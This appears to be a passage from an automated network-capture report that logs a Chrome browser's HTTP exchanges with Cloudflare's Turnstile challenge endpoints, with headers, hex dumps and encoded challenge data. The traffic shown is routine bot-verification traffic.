                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:35 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:35 GMT
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c9ef9167b9f-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:35 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4b 00 00 00 62 08 02 00 00 00 97 8f b9 43 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 3dPNGIHDRKbCIDAT$IENDB`
                                                                                                                                                                                    2024-01-26 13:41:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    21192.168.2.1649747104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:35 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/84b92c841f99b127/1706276492524/rUSBpge9MP4B7lT HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:35 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:35 GMT
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92ca259607bab-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:35 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4b 00 00 00 62 08 02 00 00 00 97 8f b9 43 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 3dPNGIHDRKbCIDAT$IENDB`
                                                                                                                                                                                    2024-01-26 13:41:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    22192.168.2.1649748104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:35 UTC804OUTGET /cdn-cgi/challenge-platform/h/g/pat/84b92c841f99b127/1706276492529/0f9d73079a8b7d0394f678ae367e0851b92badef3e469819b69f138814626d66/Dm3EdLb9rOJ2F90 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:35 UTC152INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:35 GMT
                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:35 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 35 31 7a 42 35 71 4c 66 51 4f 55 39 6e 69 75 4e 6e 34 49 55 62 6b 72 72 65 38 2d 52 70 67 5a 74 70 38 54 69 42 52 69 62 57 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                                                                                                                                                    Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gD51zB5qLfQOU9niuNn4IUbkrre8-RpgZtp8TiBRibWYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                                                                                                                                                    2024-01-26 13:41:35 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                                                                                                                                                    Data Ascii: 1J
                                                                                                                                                                                    2024-01-26 13:41:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    23192.168.2.1649749104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:36 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 29296
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    CF-Challenge: bd4b5c1cf495e39
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:36 UTC16384OUTData Raw: 76 5f 38 34 62 39 32 63 38 34 31 66 39 39 62 31 32 37 3d 73 2d 75 68 38 6e 51 4b 77 42 75 62 39 59 4d 44 6b 51 6b 31 75 30 6b 30 6b 6b 51 76 30 68 66 68 59 39 30 57 30 77 68 73 34 2d 6e 32 75 30 73 6e 30 6b 2d 51 66 30 71 68 51 2d 51 69 30 44 6b 68 71 2d 51 24 71 62 4a 30 51 35 79 30 79 59 30 66 5a 4d 68 68 4a 30 6b 6d 6d 51 6c 30 6b 75 30 64 30 31 61 6d 30 74 30 6a 39 58 44 30 42 77 30 33 30 74 71 75 30 43 41 78 68 51 5a 51 68 6e 59 2d 30 50 45 4b 30 5a 31 31 42 25 32 62 6d 30 52 66 30 30 52 30 69 48 31 30 6e 2d 30 42 66 74 6b 2b 69 77 6e 71 68 44 36 6c 36 6c 37 4d 58 79 61 30 51 75 6e 6c 78 35 37 75 50 71 75 30 7a 39 5a 4b 62 64 63 71 6e 75 39 30 75 34 31 30 66 50 2d 30 79 4e 56 50 30 31 76 44 30 43 42 71 6d 6e 57 76 43 54 6e 6a 53 49 73 6c 4f 5a 42 30
                                                                                                                                                                                    Data Ascii: v_84b92c841f99b127=s-uh8nQKwBub9YMDkQk1u0k0kkQv0hfhY90W0whs4-n2u0sn0k-Qf0qhQ-Qi0Dkhq-Q$qbJ0Q5y0yY0fZMhhJ0kmmQl0ku0d01am0t0j9XD0Bw030tqu0CAxhQZQhnY-0PEK0Z11B%2bm0Rf00R0iH10n-0Bftk+iwnqhD6l6l7MXya0Qunlx57uPqu0z9ZKbdcqnu90u410fP-0yNVP01vD0CBqmnWvCTnjSIslOZB0
                                                                                                                                                                                    2024-01-26 13:41:36 UTC12912OUTData Raw: 57 51 33 63 74 65 73 77 24 45 6e 30 6a 68 44 75 51 4e 30 5a 30 44 30 62 4d 42 59 30 4f 4d 51 49 6a 59 30 78 6d 73 30 62 38 4a 78 30 4f 30 73 2d 30 68 30 68 68 79 41 44 66 30 67 68 44 65 2b 31 30 31 68 51 77 30 52 30 5a 68 42 69 44 79 30 76 68 42 39 30 52 30 55 68 6e 30 6e 49 30 54 68 31 58 64 4c 30 35 59 74 6e 51 6f 63 4b 39 73 30 6e 53 63 66 30 31 68 44 77 30 45 67 7a 77 51 69 6e 6b 68 6a 7a 51 61 30 57 45 73 45 44 46 68 41 30 79 34 24 68 51 62 30 6b 68 6e 52 30 4a 68 62 58 2b 7a 30 6e 68 6a 77 30 42 39 4a 68 73 45 6e 2d 30 37 6c 66 7a 51 77 30 54 63 35 75 30 46 30 2b 30 30 68 42 36 30 49 68 42 30 51 70 6d 57 30 4a 39 44 49 30 54 30 42 68 42 6b 30 48 68 74 57 30 68 30 41 68 44 77 30 4f 30 55 59 6e 68 51 69 30 5a 68 6a 77 30 4d 6d 5a 68 51 30 51 6f 63 41
                                                                                                                                                                                    Data Ascii: WQ3ctesw$En0jhDuQN0Z0D0bMBY0OMQIjY0xms0b8Jx0O0s-0h0hhyADf0ghDe+101hQw0R0ZhBiDy0vhB90R0Uhn0nI0Th1XdL05YtnQocK9s0nScf01hDw0EgzwQinkhjzQa0WEsEDFhA0y4$hQb0khnR0JhbX+z0nhjw0B9JhsEn-07lfzQw0Tc5u0F0+00hB60IhB0QpmW0J9DI0T0BhBk0HhtW0h0AhDw0O0UYnhQi0Zhjw0MmZhQ0QocA
                                                                                                                                                                                    2024-01-26 13:41:36 UTC327INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:36 GMT
                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cf-chl-gen: VAQG9hiK+WDrNlCs89q3aLH1pYQrOr+FbeUfELPVeWcynJAO5ahzsG8nJ0wsHqzI$5iPPzobu+54OecjFgRXANQ==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92ca61b2f676a-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1042INData Raw: 34 37 36 63 0d 0a 66 5a 61 64 69 49 32 4c 6b 35 79 58 74 72 47 7a 6d 35 4f 57 69 62 6d 45 6e 62 2f 48 6f 61 58 42 78 4d 36 34 69 73 61 54 79 36 76 4b 7a 4d 65 2b 30 70 75 67 33 4e 7a 45 70 4f 44 66 70 71 76 6f 34 75 58 72 7a 39 79 37 36 38 75 72 39 4d 50 79 77 73 50 58 78 37 50 52 74 76 65 2f 39 77 4c 2b 31 67 54 78 34 38 66 41 39 51 58 4a 44 4d 30 49 38 50 72 4d 7a 68 41 41 79 52 66 51 37 68 6e 72 47 39 33 39 48 68 7a 33 48 2b 38 6b 47 76 6a 2b 43 75 50 30 43 41 37 35 49 65 77 65 4d 79 34 71 35 79 59 55 4d 51 67 6f 39 42 77 4d 44 7a 41 55 4d 66 34 77 49 7a 34 54 4e 44 6b 63 4d 30 45 4a 44 55 77 76 45 42 4a 51 45 78 38 67 52 42 63 72 47 46 73 62 50 6c 4d 74 56 56 41 2f 4f 55 45 33 52 68 35 6d 61 54 64 69 58 6a 34 32 4a 57 55 6f 4d 57 42 64 4c 7a 5a 42 65
                                                                                                                                                                                    Data Ascii: 476cfZadiI2Lk5yXtrGzm5OWibmEnb/HoaXBxM64isaTy6vKzMe+0pug3NzEpODfpqvo4uXrz9y768ur9MPywsPXx7PRtve/9wL+1gTx48fA9QXJDM0I8PrMzhAAyRfQ7hnrG939Hhz3H+8kGvj+CuP0CA75IeweMy4q5yYUMQgo9BwMDzAUMf4wIz4TNDkcM0EJDUwvEBJQEx8gRBcrGFsbPlMtVVA/OUE3Rh5maTdiXj42JWUoMWBdLzZBe
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 79 6f 71 54 75 73 53 75 71 34 65 2b 6d 37 2b 68 6a 62 65 7a 7a 74 71 37 70 4a 72 4f 6d 5a 6e 4f 6e 4d 37 59 34 37 76 61 36 4f 57 78 33 72 71 35 37 4f 6a 4e 76 4d 72 6f 35 72 50 56 31 61 37 76 79 38 54 71 38 2f 53 33 32 64 33 72 76 74 37 33 2b 77 6a 44 31 64 45 43 39 41 34 4a 32 2b 37 4f 36 38 33 69 30 74 50 6a 41 50 50 5a 35 2b 54 32 31 50 4c 52 44 53 4d 52 49 66 6f 58 2f 75 62 38 4b 2b 55 69 35 2f 37 6f 45 65 6b 68 44 77 67 43 4b 76 41 76 49 66 4d 6d 43 79 77 79 4c 50 6b 38 47 79 30 35 41 6b 51 79 4a 7a 30 37 4e 52 74 4e 4b 44 73 4b 44 7a 31 41 53 53 59 71 51 54 63 51 45 45 67 72 4a 55 70 4b 47 6a 6f 65 54 31 6c 43 57 32 59 6d 58 55 46 63 58 6a 6c 68 58 47 64 77 54 69 31 45 51 7a 34 32 56 47 4a 69 56 57 70 46 65 54 6c 79 50 46 56 54 65 6d 2b 47 5a 6d 4a
                                                                                                                                                                                    Data Ascii: yoqTusSuq4e+m7+hjbezztq7pJrOmZnOnM7Y47va6OWx3rq57OjNvMro5rPV1a7vy8Tq8/S32d3rvt73+wjD1dEC9A4J2+7O683i0tPjAPPZ5+T21PLRDSMRIfoX/ub8K+Ui5/7oEekhDwgCKvAvIfMmCywyLPk8Gy05AkQyJz07NRtNKDsKDz1ASSYqQTcQEEgrJUpKGjoeT1lCW2YmXUFcXjlhXGdwTi1EQz42VGJiVWpFeTlyPFVTem+GZmJ
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 49 79 72 30 70 2b 73 7a 38 69 56 31 39 53 73 77 39 32 74 30 4b 71 31 33 4f 47 68 73 65 54 5a 7a 38 4c 63 74 2b 43 6f 34 75 75 6e 35 39 4b 75 38 4f 65 79 36 75 37 73 74 64 6a 61 33 50 44 38 2f 64 7a 51 2b 2f 54 6a 38 76 30 49 30 4d 50 72 2f 4f 59 42 32 2f 67 50 33 65 58 74 46 76 37 77 45 78 6b 5a 39 67 6e 6d 33 4e 54 62 43 66 62 67 37 76 37 6a 47 64 33 33 41 66 59 6b 2f 66 76 39 48 51 51 7a 41 43 67 50 45 69 58 33 4a 67 6f 4e 4d 42 73 7a 43 69 34 70 39 77 7a 2b 44 67 41 67 45 54 49 56 48 77 67 4a 51 6b 38 50 54 43 68 45 49 46 4d 2f 55 43 4a 58 44 42 6f 70 4c 54 31 53 4e 79 6b 79 5a 43 42 50 50 6a 51 67 4e 32 63 2f 5a 6a 31 6d 57 57 64 64 55 43 56 74 59 47 74 66 51 57 52 73 61 30 56 73 63 7a 78 54 63 47 47 42 67 46 39 57 4f 55 4a 67 68 45 6c 6d 6a 58 64 69
                                                                                                                                                                                    Data Ascii: Iyr0p+sz8iV19Ssw92t0Kq13OGhseTZz8Lct+Co4uun59Ku8Oey6u7stdja3PD8/dzQ+/Tj8v0I0MPr/OYB2/gP3eXtFv7wExkZ9gnm3NTbCfbg7v7jGd33AfYk/fv9HQQzACgPEiX3JgoNMBszCi4p9wz+DgAgETIVHwgJQk8PTChEIFM/UCJXDBopLT1SNykyZCBPPjQgN2c/Zj1mWWddUCVtYGtfQWRsa0VsczxTcGGBgF9WOUJghElmjXdi
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 65 31 73 38 7a 56 76 4c 76 52 76 38 44 49 72 74 6e 4c 32 75 57 34 74 4e 43 38 79 75 50 6a 32 73 33 73 75 4b 66 67 77 71 62 6a 38 37 4c 41 72 37 53 74 72 75 66 57 36 2f 43 36 39 4e 48 6a 76 73 50 44 35 74 48 65 33 2f 72 32 2f 73 6a 64 34 65 50 2b 44 38 76 6b 36 65 59 4a 43 66 6a 76 35 76 34 4b 38 43 45 67 45 64 77 59 45 78 7a 77 4a 77 58 38 2b 67 63 44 48 51 44 37 4c 52 49 47 4e 54 55 6c 43 52 51 4c 47 66 63 52 47 42 38 76 39 77 77 45 46 55 5a 44 47 45 70 49 4a 30 31 4a 51 45 6b 73 51 77 30 50 49 6a 51 30 4e 56 4d 5a 49 79 64 4f 4c 44 63 37 46 31 64 4f 51 45 52 63 4c 69 42 57 58 6b 59 35 62 45 59 36 50 32 39 78 54 32 5a 54 56 6b 52 79 61 47 46 58 65 6d 70 51 4e 30 35 73 56 48 4e 66 67 56 31 52 56 46 68 6b 56 6d 68 59 59 45 56 59 58 32 64 64 57 33 4f 41 58
                                                                                                                                                                                    Data Ascii: e1s8zVvLvRv8DIrtnL2uW4tNC8yuPj2s3suKfgwqbj87LAr7StrufW6/C69NHjvsPD5tHe3/r2/sjd4eP+D8vk6eYJCfjv5v4K8CEgEdwYExzwJwX8+gcDHQD7LRIGNTUlCRQLGfcRGB8v9wwEFUZDGEpIJ01JQEksQw0PIjQ0NVMZIydOLDc7F1dOQERcLiBWXkY5bEY6P29xT2ZTVkRyaGFXempQN05sVHNfgV1RVFhkVmhYYEVYX2ddW3OAX
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 78 33 70 69 74 74 35 7a 6b 72 74 50 51 72 2b 65 66 6f 4f 79 32 74 63 37 68 75 73 6e 46 39 4d 57 39 35 37 65 75 38 2b 7a 4f 39 37 76 71 41 50 72 41 37 67 58 39 41 2b 51 4a 41 38 62 45 32 67 6e 32 34 65 45 51 36 64 33 6e 45 41 58 78 45 39 63 59 45 65 72 6b 38 51 7a 56 33 79 41 52 38 66 58 74 47 66 48 6e 4b 67 50 37 34 68 76 73 41 53 73 72 43 65 38 30 38 77 6b 34 2b 42 49 33 39 54 6a 36 39 41 38 37 46 52 58 35 50 67 51 69 46 30 55 79 43 52 35 4e 53 43 73 59 55 69 55 7a 4d 42 4e 44 4b 79 6f 69 57 43 59 72 45 78 51 7a 4d 43 70 53 4f 7a 55 74 59 7a 74 61 4d 30 45 6c 48 6d 31 58 51 58 46 74 58 31 46 78 63 45 6b 32 53 33 6c 30 64 44 55 38 4e 44 31 37 50 33 39 58 55 34 4e 65 55 6b 47 4a 59 6c 35 65 6a 48 74 46 6a 46 71 51 62 6f 39 66 68 49 56 6e 6d 59 64 52 62 6c
                                                                                                                                                                                    Data Ascii: x3pitt5zkrtPQr+efoOy2tc7husnF9MW957eu8+zO97vqAPrA7gX9A+QJA8bE2gn24eEQ6d3nEAXxE9cYEerk8QzV3yAR8fXtGfHnKgP74hvsASsrCe808wk4+BI39Tj69A87FRX5PgQiF0UyCR5NSCsYUiUzMBNDKyoiWCYrExQzMCpSOzUtYztaM0ElHm1XQXFtX1FxcEk2S3l0dDU8ND17P39XU4NeUkGJYl5ejHtFjFqQbo9fhIVnmYdRbl
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 33 37 69 38 34 2b 54 69 74 4b 4c 6d 31 75 4c 75 36 74 76 51 71 75 2f 48 72 2f 50 79 79 36 7a 32 39 74 44 49 41 41 44 71 33 41 44 2b 2f 62 67 48 41 73 62 48 78 77 63 48 32 64 77 4d 34 38 51 54 44 2f 37 77 46 42 50 58 44 78 73 57 43 50 77 62 47 77 73 62 48 78 34 66 38 43 67 6c 49 2f 6a 6f 4c 42 63 46 4c 69 6f 71 36 7a 55 77 43 52 45 7a 4d 69 51 5a 4e 7a 67 52 44 55 45 37 41 41 31 43 51 42 67 42 46 55 4a 44 47 55 6c 4a 52 67 67 4d 53 68 41 6c 55 56 51 2b 43 56 52 56 55 79 6c 5a 56 30 59 63 58 46 6f 68 51 53 42 68 54 30 45 6c 5a 57 4d 31 4b 47 64 42 4f 6a 31 74 61 6a 41 77 62 32 39 52 4e 58 4a 7a 52 58 78 38 5a 31 45 33 65 30 42 5a 51 48 39 45 58 59 6d 44 67 34 42 5a 68 34 5a 4d 52 34 74 6c 59 5a 4f 50 56 47 57 56 6c 47 35 35 6e 4a 64 77 57 4a 36 64 69 32 31
                                                                                                                                                                                    Data Ascii: 37i84+TitKLm1uLu6tvQqu/Hr/Pyy6z29tDIAADq3AD+/bgHAsbHxwcH2dwM48QTD/7wFBPXDxsWCPwbGwsbHx4f8CglI/joLBcFLioq6zUwCREzMiQZNzgRDUE7AA1CQBgBFUJDGUlJRggMShAlUVQ+CVRVUylZV0YcXFohQSBhT0ElZWM1KGdBOj1tajAwb29RNXJzRXx8Z1E3e0BZQH9EXYmDg4BZh4ZMR4tlYZOPVGWVlG55nJdwWJ6di21
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 72 62 73 78 71 53 38 77 38 58 72 77 4d 4f 7a 31 75 50 33 30 72 65 30 79 2b 66 61 36 76 76 78 33 64 44 56 32 4f 62 53 43 65 4d 4d 32 4e 33 33 43 4d 6a 51 32 68 4d 54 34 51 2f 32 34 68 6e 7a 39 65 6a 63 35 68 38 66 37 52 77 63 38 4f 54 75 4a 79 6a 31 49 77 76 32 4c 51 66 6f 2f 50 44 36 4d 7a 51 43 4d 44 41 46 2b 41 4d 37 50 51 6f 33 48 77 74 42 47 77 45 52 42 51 39 48 53 52 5a 45 52 42 6b 4e 46 30 38 48 48 6b 73 7a 48 31 55 76 44 53 55 5a 49 31 73 54 4b 6c 68 59 4c 53 45 72 59 31 38 79 58 30 63 7a 61 55 51 32 4f 53 30 33 62 32 73 2b 62 47 78 42 4e 54 39 33 64 45 5a 7a 57 30 64 39 57 48 52 4e 51 55 75 44 67 46 4b 41 67 46 56 4a 55 34 75 4a 57 6f 64 76 57 35 46 73 6a 47 46 56 58 35 65 56 5a 70 53 55 61 56 31 6e 6e 35 35 75 6d 34 4e 76 70 59 43 6b 64 57 6c 7a
                                                                                                                                                                                    Data Ascii: rbsxqS8w8XrwMOz1uP30re0y+fa6vvx3dDV2ObSCeMM2N33CMjQ2hMT4Q/24hnz9ejc5h8f7Rwc8OTuJyj1Iwv2LQfo/PD6MzQCMDAF+AM7PQo3HwtBGwERBQ9HSRZERBkNF08HHkszH1UvDSUZI1sTKlhYLSErY18yX0czaUQ2OS03b2s+bGxBNT93dEZzW0d9WHRNQUuDgFKAgFVJU4uJWodvW5FsjGFVX5eVZpSUaV1nn55um4NvpYCkdWlz
                                                                                                                                                                                    2024-01-26 13:41:36 UTC1369INData Raw: 48 7a 34 4c 48 30 79 63 79 78 7a 2b 2f 62 75 50 6a 6e 38 72 66 58 37 2f 7a 62 30 73 36 2f 35 51 67 48 39 41 48 61 2b 77 54 70 79 51 6a 62 45 51 55 4f 47 4f 6e 56 39 67 34 50 32 66 59 67 47 74 6e 69 46 66 6b 44 38 78 51 48 49 53 51 48 39 53 55 4c 2f 76 6f 53 45 78 49 44 4a 69 30 75 43 67 50 77 38 69 38 73 2f 76 55 78 45 54 4a 44 4d 78 55 36 52 54 4d 70 42 77 59 38 47 55 55 65 44 55 4d 79 53 54 42 53 4e 78 45 79 45 54 41 77 4d 7a 70 4a 47 54 77 74 56 6a 52 4e 56 79 49 6f 51 31 74 5a 4b 45 4e 4b 58 54 42 4c 59 30 30 2f 59 30 39 46 64 31 5a 79 4e 6d 56 38 54 44 6c 64 4f 57 31 69 59 54 31 78 5a 59 4e 62 68 30 64 48 5a 6b 78 2b 66 6d 35 62 66 31 4a 76 69 5a 69 4e 65 48 46 54 55 6f 68 57 6b 57 35 54 6b 33 61 63 65 35 31 35 6f 48 68 37 61 58 69 62 61 4a 31 73 61
                                                                                                                                                                                    Data Ascii: Hz4LH0ycyxz+/buPjn8rfX7/zb0s6/5QgH9AHa+wTpyQjbEQUOGOnV9g4P2fYgGtniFfkD8xQHISQH9SUL/voSExIDJi0uCgPw8i8s/vUxETJDMxU6RTMpBwY8GUUeDUMySTBSNxEyETAwMzpJGTwtVjRNVyIoQ1tZKENKXTBLY00/Y09Fd1ZyNmV8TDldOW1iYT1xZYNbh0dHZkx+fm5bf1JviZiNeHFTUohWkW5Tk3ace515oHh7aXibaJ1sa


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    24192.168.2.1649752104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:36 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:37 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:37 GMT
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    cf-chl-out: zD/dj5UUSXY+VcIjXVck+A==$V1Vt3/z/8LM5K5LOLAULPg==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92caa4c34673b-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:37 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                    Data Ascii: 7invalid
